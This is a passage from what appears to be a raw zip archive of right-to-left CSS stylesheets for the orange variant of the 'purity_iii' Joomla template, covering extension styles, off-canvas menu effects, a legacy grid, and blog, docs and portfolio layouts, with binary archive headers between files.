  padding: 10px 0 10px 10px;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\�l�d��1purity_iii/css/rtl/orange/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 0 5px 10px;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\���VV/purity_iii/css/rtl/orange/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}PKӜ�\�#���Q�Q(purity_iii/css/rtl/orange/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  right: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  right: auto;
  left: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ff8800;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #b35f00;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  right: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffffff;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  right: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #e67a00;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-right: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 12px 0 0;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  left: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #ff8800;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #b35f00;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}


@media (max-width: 990px) {
  .off-canvas body > * {
    left: 0;
    -webkit-transform: translateX(0%);
    -ms-transform: translateX(0%);
    transform: translateX(0%);
  }
  .off-canvas #off-canvas-nav .t3-mainnav {
    -webkit-transform: translateX(100%);
    -ms-transform: translateX(100%);
    transform: translateX(100%);
  }
  .off-canvas-enabled body > * {
    -webkit-transform: translateX(-250px);
    -ms-transform: translateX(-250px);
    transform: translateX(-250px);
  }
}
.off-canvas-left.t3-off-canvas {
  left: 0;
  right: auto;
}
.off-canvas-left.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}PKӜ�\�('�

)purity_iii/css/rtl/orange/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-left: -20px;
  margin-right: -20px;
}
[class*="span"] {
  float: right;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-right: 100%;
}
.offset11 {
  margin-right: 91.66666667%;
}
.offset10 {
  margin-right: 83.33333333%;
}
.offset9 {
  margin-right: 75%;
}
.offset8 {
  margin-right: 66.66666667%;
}
.offset7 {
  margin-right: 58.33333333%;
}
.offset6 {
  margin-right: 50%;
}
.offset5 {
  margin-right: 41.66666667%;
}
.offset4 {
  margin-right: 33.33333333%;
}
.offset3 {
  margin-right: 25%;
}
.offset2 {
  margin-right: 16.66666667%;
}
.offset1 {
  margin-right: 8.33333333%;
}
.offset0 {
  margin-right: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\1�o�ll%purity_iii/css/rtl/orange/windows.cssnu&1i�

.window body {
  height: auto;
  padding: 0;
  margin: 0;
}
.window .window-mainbody {
  padding: 20px;
}
PKӜ�\;�K��*purity_iii/css/rtl/orange/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-left: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #b35f00;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\��T��*purity_iii/css/rtl/orange/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #ff8800;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\4purity_iii/css/rtl/orange/layouts/features-intro.cssnu&1i�PKӜ�\��k.purity_iii/css/rtl/orange/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
